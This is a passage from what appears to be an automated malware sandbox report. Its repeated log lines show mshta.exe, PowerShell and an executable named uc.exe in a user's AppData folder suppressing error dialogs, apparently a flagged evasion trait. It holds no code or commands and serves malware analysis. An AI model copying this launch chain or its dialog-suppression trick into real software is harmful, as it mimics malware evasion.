Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
